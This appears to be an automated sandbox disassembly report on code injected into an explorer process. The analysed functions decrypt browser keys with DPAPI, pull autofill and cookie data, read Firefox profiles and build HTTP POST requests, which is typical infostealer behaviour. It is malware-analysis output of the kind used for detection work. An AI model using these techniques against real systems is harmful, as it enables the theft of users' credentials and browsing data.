                                                                                                                              • Instruction ID: d1a4a7d08c38de56b72a0d63a7476ee82f897f5c75453001fb28e6921f4fd087
                                                                                                                              • Opcode Fuzzy Hash: d04d673d4ca8a8abb742ae0d80be0df8476515d24161e36d97e262f8dde32171
                                                                                                                              • Instruction Fuzzy Hash: 4B31A1303043058BDB94AB788C9DA3E779AFB84311B84492CB956D32C2FBB8CD199252

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 531 801d4a-801d5c 532 801d62-801d66 531->532 533 801eb4-801ebe 531->533 532->533 534 801d6c-801d77 call 8019b4 532->534 537 801d79-801d89 call 801953 534->537 538 801d8b-801d97 call 801953 534->538 543 801d9b-801d9d 537->543 538->543 543->533 544 801da3-801db4 FindFirstFileW 543->544 545 801dba 544->545 546 801ead-801eaf call 801011 544->546 548 801dbe-801dc3 545->548 546->533 549 801dc5-801dd7 lstrcmpiW 548->549 550 801e3d-801e6a call 801953 call 80199d lstrcmpiW 548->550 551 801ddd-801def lstrcmpiW 549->551 552 801e8e-801e9c FindNextFileW 549->552 561 801e87-801e89 call 801011 550->561 562 801e6c-801e75 call 801cf7 550->562 551->552 555 801df5-801e00 call 8019b4 551->555 552->548 556 801ea2-801ea9 FindClose 552->556 563 801e02-801e07 555->563 564 801e09 555->564 556->546 561->552 562->561 570 801e77-801e7f 562->570 566 801e0b-801e3b call 801953 call 80199d call 801d4a 563->566 564->566 566->561 570->561
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 008019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00802CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 008019C4
                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00801DA9
                                                                                                                              • lstrcmpiW.KERNEL32(?,008562CC), ref: 00801DCF
                                                                                                                              • lstrcmpiW.KERNEL32(?,008562D0), ref: 00801DE7
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00801E62
                                                                                                                                • Part of subcall function 00801CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00802C27), ref: 00801D02
                                                                                                                                • Part of subcall function 00801CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00801D0D
                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00801E94
                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00801EA3
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                              • String ID: *.*$\*.*
                                                                                                                              • API String ID: 232625764-1692270452
                                                                                                                              • Opcode ID: 098505708471225806d763ceb4b1ba418e29de2b0eb0b6a50ebed917a2c86bc4
                                                                                                                              • Instruction ID: 9355e8f6ebee4f0efeaf71521591187e828377a026acaaf2ddeab23030a2a4e4
                                                                                                                              • Opcode Fuzzy Hash: 098505708471225806d763ceb4b1ba418e29de2b0eb0b6a50ebed917a2c86bc4
                                                                                                                              • Instruction Fuzzy Hash: DD3172303043419BCF91AB748C9CA6F7AE9FF84361F804A29ED4AC32D1EB7588598752

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 641 803e04-803e11 call 801b6a 644 803ed4-803ed8 641->644 645 803e17-803e22 call 801c31 641->645 645->644 648 803e28-803e34 call 802fb1 645->648 651 803ec8-803ecc 648->651 652 803e3a-803e4f call 80123b 648->652 651->644 655 803ec0-803ec7 call 801011 652->655 656 803e51-803e58 652->656 655->651 657 803e5a-803e6a 656->657 658 803ebf 656->658 660 803eb8-803eba call 801011 657->660 661 803e6c-803e7c RtlCompareMemory 657->661 658->655 660->658 661->660 663 803e7e-803ea6 CryptUnprotectData 661->663 663->660 665 803ea8-803ead 663->665 665->660 666 803eaf-803eb3 665->666 666->660
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
                                                                                                                                • Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F
                                                                                                                                • Part of subcall function 00801C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00803E1E,00000000,?,00803FA8), ref: 00801C46
                                                                                                                                • Part of subcall function 00801C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00803FA8), ref: 00801C56
                                                                                                                                • Part of subcall function 00801C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00803FA8), ref: 00801C76
                                                                                                                                • Part of subcall function 00801C31: CloseHandle.KERNEL32(00000000,?,00803FA8), ref: 00801C91
                                                                                                                                • Part of subcall function 00802FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00803E30,00000000,00000000,?,00803FA8), ref: 00802FC1
                                                                                                                                • Part of subcall function 00802FB1: lstrlen.KERNEL32("encrypted_key":",?,00803FA8), ref: 00802FCE
                                                                                                                                • Part of subcall function 00802FB1: StrStrIA.SHLWAPI("encrypted_key":",0085692C,?,00803FA8), ref: 00802FDD
                                                                                                                                • Part of subcall function 0080123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00803E4B,00000000), ref: 0080124A
                                                                                                                                • Part of subcall function 0080123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00801268
                                                                                                                                • Part of subcall function 0080123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00801295
                                                                                                                              • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00803E74
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00803E9E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                              • String ID: $DPAP$DPAP$IDPAP
                                                                                                                              • API String ID: 3076719866-957854035
                                                                                                                              • Opcode ID: 0c9a71f6c9dd6d32bf1e80a77abb3408d06bb78beb86571a03cd0b67193d9ee9
                                                                                                                              • Instruction ID: 82945679c52c084d7a080454022275af3027d20138a0a3b4f0302a2b51b54514
                                                                                                                              • Opcode Fuzzy Hash: 0c9a71f6c9dd6d32bf1e80a77abb3408d06bb78beb86571a03cd0b67193d9ee9
                                                                                                                              • Instruction Fuzzy Hash: 9E219F72604345ABDB61EA68CC84A6FB2DDFB84710F44062DF941D7281EB74CE498793
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0080116F
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00804BB6
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00804BBF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1675517319-0
                                                                                                                              • Opcode ID: c854e9098fccac621fa97ed1b583eb8b1b9572b12d06d99ae585722660bf5aec
                                                                                                                              • Instruction ID: 4f6c0e95b985954e5531b6db325bd5c1f8f84b68c19023a048052461bbf220ea
                                                                                                                              • Opcode Fuzzy Hash: c854e9098fccac621fa97ed1b583eb8b1b9572b12d06d99ae585722660bf5aec
                                                                                                                              • Instruction Fuzzy Hash: 46E0927154121067CA98BBB4BC2DA4A3B58FB91371F109554F265D20D1DA3588408651
                                                                                                                              APIs
                                                                                                                              • GetSystemInfo.KERNELBASE(008620A4,00000001,00000000,0000000A,00853127,008028DA,00000000,?), ref: 0080BFFC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 31276548-0
                                                                                                                              • Opcode ID: 9e5f32f2fb000d9b9eac91c10059ff592e2546d0644fa7ddd3acbed61f4f3467
                                                                                                                              • Instruction ID: 57a135096312b090adc0985e3ef2d3a17dded0f1019ad75980eeda60286a7794
                                                                                                                              • Opcode Fuzzy Hash: 9e5f32f2fb000d9b9eac91c10059ff592e2546d0644fa7ddd3acbed61f4f3467
                                                                                                                              • Instruction Fuzzy Hash: 81E0ED3178470035EA903ABC6C0BF161555FF81B01F699525B720E91CBEF9981701027

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
                                                                                                                                • Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 00803C6A
                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00803C76
                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 00803C7D
                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00803C89
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00803D2F
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00803D36
                                                                                                                              • wsprintfA.USER32 ref: 00803D55
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00803D61
                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00803D89
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00803DB2
                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00803DED
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                              • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                              • API String ID: 2923052733-3488123210
                                                                                                                              • Opcode ID: 061f98764f594a21738498a06d581d89e0cb0b5a5f0c34b65718cc876680fa30
                                                                                                                              • Instruction ID: 6b74447527f89df3bae87de9cc5975402af516c434c6fff097c197b49308cb80
                                                                                                                              • Opcode Fuzzy Hash: 061f98764f594a21738498a06d581d89e0cb0b5a5f0c34b65718cc876680fa30
                                                                                                                              • Instruction Fuzzy Hash: 7D417B30604341ABDB51AB788C85A3F7AADFF85765F400829F985E3292DA39DD058B62

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 348 8028f8-8028fa 349 802900-80291c call 801000 call 8202ec 348->349 350 802ac8-802ada call 853848 DeleteFileW call 801011 348->350 359 802922-80293a call 801fa7 349->359 360 802a8f-802aa2 call 81fb92 lstrlen 349->360 358 802adf-802ae6 350->358 367 802948-80295f call 801fa7 359->367 368 80293c-802942 359->368 365 802ac1-802ac3 call 801011 360->365 366 802aa4-802abc call 801798 * 3 360->366 365->350 366->365 376 802961-802967 367->376 377 80296d-802984 call 801fa7 367->377 368->367 370 802944 368->370 370->367 376->377 380 802969 376->380 383 802992-8029a7 call 801fa7 377->383 384 802986-80298c 377->384 380->377 388 8029b5-8029cc call 801fa7 383->388 389 8029a9-8029af 383->389 384->383 385 80298e 384->385 385->383 393 8029da-8029e5 lstrlen 388->393 394 8029ce-8029d4 388->394 389->388 390 8029b1 389->390 390->388 396 802a79-802a85 call 8202ec 393->396 397 8029eb-8029f0 lstrlen 393->397 394->393 395 8029d6 394->395 395->393 396->359 403 802a8b 396->403 397->396 398 8029f6-802a11 call 801000 397->398 404 802a13 398->404 405 802a1b-802a56 call 802112 wsprintfA lstrlen 398->405 403->360 404->405 408 802a58-802a68 call 80102f 405->408 409 802a6a-802a74 lstrcat call 801011 405->409 408->409 409->396
                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00802AD2
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 008029E1
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008029EC
                                                                                                                              • wsprintfA.USER32 ref: 00802A38
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00802A44
                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00802A6C
                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00802A99
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                              • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                              • API String ID: 304071051-2605711689
                                                                                                                              • Opcode ID: 4abb796801e73fb327b924a027b14a2cc70124872d58e81dfdded2e729935a8b
                                                                                                                              • Instruction ID: fcc800745ca9045383cc57dd18e148b39cd2538dced4552dd3f441cc64b89a35
                                                                                                                              • Opcode Fuzzy Hash: 4abb796801e73fb327b924a027b14a2cc70124872d58e81dfdded2e729935a8b
                                                                                                                              • Instruction Fuzzy Hash: 5451CD302043468FDB65EF249C58A3E7ADAFF85315F44082DF881DB292EB79DC098B52

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 484 802cb5-802cc7 call 801953 488 802e17-802e2d call 802ae9 484->488 489 802ccd-802d06 call 801953 call 801000 * 2 call 801b6a 484->489 500 802df9-802e12 call 801011 * 4 489->500 501 802d0c-802d1c GetPrivateProfileSectionNamesW 489->501 500->488 501->500 502 802d22-802d26 501->502 504 802df5 502->504 505 802d2c-802d32 502->505 504->500 507 802d36-802d39 505->507 509 802ded-802df1 507->509 510 802d3f-802d4d StrStrIW 507->510 509->504 512 802d53-802d70 GetPrivateProfileStringW 510->512 513 802dd7-802de7 lstrlenW 510->513 512->513 515 802d72-802d88 GetPrivateProfileIntW 512->515 513->507 513->509 517 802d8a-802d9c call 801953 515->517 518 802dcc-802dd2 call 802ae9 515->518 523 802db4-802dca call 802ae9 call 801011 517->523 524 802d9e-802da2 517->524 518->513 523->513 525 802da4-802daa 524->525 526 802dac-802db2 524->526 525->526 526->523 526->524
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
                                                                                                                                • Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
                                                                                                                                • Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                                • Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
                                                                                                                                • Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F
                                                                                                                              • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00802D13
                                                                                                                              • StrStrIW.SHLWAPI(00000000,Profile), ref: 00802D45
                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,Path,0085637C,?,00000FFF,?), ref: 00802D68
                                                                                                                              • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00802D7B
                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 00802DD8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                              • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                              • API String ID: 2234428054-4107377610
                                                                                                                              • Opcode ID: 04f90d08370c465fb1374671c17e9d5fd4bbc2fd8d56d72514450048b33f04ff
                                                                                                                              • Instruction ID: c8ea8c24a32400b7a5b31328f5b3e81c4a9d23c863adf1cb26c56cc630ced20f
                                                                                                                              • Opcode Fuzzy Hash: 04f90d08370c465fb1374671c17e9d5fd4bbc2fd8d56d72514450048b33f04ff
                                                                                                                              • Instruction Fuzzy Hash: CD319C307043069BDBA0AB348C1963FB6A2FBC5711F504429F946E72D2EEB98C569752

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 576 801333-801385 call 801000 call 80106c call 8012a3 583 8013a0-8013a3 576->583 584 801387-80139e 576->584 586 8013aa-8013ac 583->586 587 8013b0-8013b2 584->587 586->587 588 8013b8-8013ef RtlZeroMemory 587->588 589 8015cb-8015da call 801011 587->589 593 8015c3-8015ca 588->593 594 8013f5-80141a 588->594 593->589 597 801420-801456 call 8010b1 594->597 598 8015bf 594->598 601 801458 597->601 602 80145d-801478 597->602 598->593 601->602 604 8015b5 602->604 605 80147e-801483 602->605 604->598 606 801485-801496 605->606 607 80149d-8014c7 call 801000 wsprintfW 605->607 606->607 610 8014e0-801509 607->610 611 8014c9-8014cb 607->611 618 8015a5 610->618 619 80150f-80151b 610->619 612 8014cc-8014cf 611->612 614 8014d1-8014d6 612->614 615 8014da-8014dc 612->615 614->612 616 8014d8 614->616 615->610 616->610 621 8015ac-8015b0 call 801011 618->621 619->618 623 801521-801537 call 801000 619->623 621->604 626 801539-801544 623->626 627 801546-801553 call 80102f 626->627 628 801558-80156f 626->628 627->628 632 801571 628->632 633 801573-80157d 628->633 632->633 633->626 634 80157f-801583 633->634 635 801585 call 80104c 634->635 636 80159a-8015a1 call 801011 634->636 639 80158a-801594 RtlMoveMemory 635->639 636->618 639->636
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                                • Part of subcall function 0080106C: lstrlen.KERNEL32(009A711E,00000000,00000000,00000000,00801366,74DE8A60,009A711E,00000000), ref: 00801074
                                                                                                                                • Part of subcall function 0080106C: MultiByteToWideChar.KERNEL32(00000000,00000000,009A711E,00000001,00000000,00000000), ref: 00801086
                                                                                                                                • Part of subcall function 008012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 008012B5
                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 008013C2
                                                                                                                              • wsprintfW.USER32 ref: 008014B5
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00801594
                                                                                                                              Strings
                                                                                                                              • Accept: */*Referer: %S, xrefs: 008014AF
                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 008014FB
                                                                                                                              • POST, xrefs: 00801465
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                              • API String ID: 3833683434-704803497
                                                                                                                              • Opcode ID: 7fc3fbf7d1105d7b97aba91d639164c0a5452ec76e7c8d4786ce5cf6405a3842
                                                                                                                              • Instruction ID: 16b4ed8f0f5cd9ef1e117c8a7801aecc26cf76a4776d03a4296e85456542eb37
                                                                                                                              • Opcode Fuzzy Hash: 7fc3fbf7d1105d7b97aba91d639164c0a5452ec76e7c8d4786ce5cf6405a3842
                                                                                                                              • Instruction Fuzzy Hash: A4716B70608701AFDB909F68DC88A2BBBE9FB88355F40092DF995D7291EB74DD048B52

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 667 80b1e5-80b20b 668 80b221-80b22a 667->668 669 80b20d-80b218 call 80aeea 667->669 671 80b240-80b243 668->671 672 80b22c-80b237 call 80ae65 668->672 678 80b3ea-80b3f0 669->678 679 80b21e 669->679 673 80b3b9-80b3d3 671->673 674 80b249-80b26b call 80a7ae 671->674 682 80b3b4-80b3b7 672->682 683 80b23d 672->683 680 80b3db-80b3df 673->680 687 80b296-80b29f 674->687 688 80b26d-80b278 674->688 679->668 685 80b3e1-80b3e3 680->685 686 80b3e8 680->686 682->673 689 80b3d5-80b3d8 682->689 683->671 685->686 690 80b3e5-80b3e7 685->690 686->678 691 80b2a1 687->691 692 80b2d6-80b2ea call 806a5a 687->692 693 80b27d-80b291 call 80a1c6 688->693 689->680 690->686 694 80b2a3-80b2a7 691->694 695 80b2a9-80b2ad 691->695 702 80b2f6-80b2fd 692->702 703 80b2ec-80b2f1 692->703 693->682 694->692 694->695 695->682 697 80b2b3-80b2b9 call 80a67c 695->697 704 80b2be-80b2c2 697->704 706 80b373 702->706 707 80b2ff-80b30e 702->707 703->682 704->692 709 80b2c4-80b2d4 704->709 708 80b377-80b37a 706->708 707->708 710 80b310-80b329 CreateFileMappingW 708->710 711 80b37c 708->711 709->693 712 80b32b-80b357 MapViewOfFile 710->712 713 80b37e-80b3ab call 80a1c6 710->713 711->682 712->713 714 80b359-80b370 712->714 713->682 718 80b3ad 713->718 714->706 718->682
                                                                                                                              APIs
                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0080B31D
                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0080B34F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CreateMappingView
                                                                                                                              • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                              • API String ID: 3452162329-3826999013
                                                                                                                              • Opcode ID: 067c480d939a45935c946aa9e49aa5a4f687cb7b8b37a0836c12e76ef192b91b
                                                                                                                              • Instruction ID: 54421e6c99b99dad515edf5905306636cb84db5183d47e30d0b85af4834f524e
                                                                                                                              • Opcode Fuzzy Hash: 067c480d939a45935c946aa9e49aa5a4f687cb7b8b37a0836c12e76ef192b91b
                                                                                                                              • Instruction Fuzzy Hash: 35518B712047419FDB65CF18CC45A2AB7E6FB88314F25882EE992CB3D1DBB0E815CB52

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 719 80a40e-80a424 720 80a4a2-80a4aa 719->720 721 80a426-80a42a 719->721 724 80a4ae-80a4c8 720->724 722 80a431-80a441 721->722 723 80a42c-80a42f 721->723 725 80a443 722->725 726 80a469-80a4a0 memcpy 722->726 723->720 723->722 727 80a4cc-80a4e3 ReadFile 724->727 728 80a445-80a448 725->728 729 80a44a-80a45a memcpy 725->729 726->724 730 80a524-80a538 call 80a2aa 727->730 731 80a4e5-80a4ee 727->731 728->726 728->729 732 80a45d 729->732 730->732 738 80a53e-80a553 memset 730->738 731->730 737 80a4f0-80a4ff call 80a250 731->737 734 80a45f-80a466 732->734 737->727 741 80a501-80a51f call 80a1c6 737->741 738->734 741->734
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memcpy$FileReadmemset
                                                                                                                              • String ID: winRead
                                                                                                                              • API String ID: 2051157613-2759563040
                                                                                                                              • Opcode ID: 2640a25a4757365f520bf036292306143f2baf7c676591687f6651bb5200131f
                                                                                                                              • Instruction ID: 8c9fda76a29acd87857245622d0d2967441843ac316cca334dced91b5738b6da
                                                                                                                              • Opcode Fuzzy Hash: 2640a25a4757365f520bf036292306143f2baf7c676591687f6651bb5200131f
                                                                                                                              • Instruction Fuzzy Hash: 3C318976208304ABD784DE68CC8599F77AAFFC8310F845928F895C7291E6B0EC048B97

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 744 802e30-802e55 StrStrIW 745 802e57-802e6c call 8019e5 744->745 746 802ebe-802eec call 801000 RegOpenKeyExW 744->746 751 802ebc 745->751 752 802e6e-802e79 call 801bc5 745->752 753 802f68-802f74 call 801011 746->753 754 802eee-802efd 746->754 751->746 762 802eb5-802eb7 call 801011 752->762 763 802e7b-802e85 call 801afe 752->763 756 802f50-802f5c RegEnumKeyExW 754->756 759 802f5e-802f62 RegCloseKey 756->759 760 802eff-802f26 call 801953 call 80199d call 802e30 756->760 759->753 777 802f2b-802f4f call 801011 760->777 762->751 770 802e87-802e97 call 80199d 763->770 771 802eae-802eb0 call 801011 763->771 770->771 778 802e99-802e9f 770->778 771->762 777->756 778->771 780 802ea0 call 802c77 778->780 780->771
                                                                                                                              APIs
                                                                                                                              • StrStrIW.KERNELBASE(?,?), ref: 00802E4B
                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00802EE4
                                                                                                                              • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00802F54
                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00802F62
                                                                                                                                • Part of subcall function 008019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
                                                                                                                                • Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
                                                                                                                                • Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
